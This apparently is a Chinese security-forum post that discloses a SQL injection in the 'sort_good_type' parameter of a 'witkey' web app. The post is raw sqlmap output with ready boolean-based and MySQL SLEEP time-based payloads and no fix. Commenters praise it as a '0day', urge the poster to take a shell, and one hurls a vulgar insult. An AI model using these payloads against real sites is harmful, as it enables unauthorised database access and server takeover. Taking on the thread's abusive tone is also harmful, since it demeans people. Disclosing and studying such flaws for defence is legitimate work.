sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: sort_good_type Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: app=witkey&ac=index&sort_industry=&sort_good_type=2 AND 7672=7672&sort_day=&sort_price=&sort_addtime= Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: app=witkey&ac=index&sort_industry=&sort_good_type=2 AND SLEEP(5)&sort_day=&sort_price=&sort_addtime= ---
评论21次
楼主试试看拿Shell~~
撸主。。。求求求。。。。。。。。。
楼主 头像 才是 亮点,,哈哈
LZ好样的!!!
sqlmap跑了下
简单明了,GOOD
最直接的0day
这个App官网米有。
rices ~~~大牛牛~~一直关注着你·~·
文章简洁明了 甚是喜欢
这个很干脆
撸主v5
呆b
嘿,Rices大牛发火了,后果很严重~~~~~~~
撸过咯! 顶起
挖洞比赛。。。
你惹到 Rices牛了
艹你爹.
撸主对wy一往情深有木有,都用来做头像了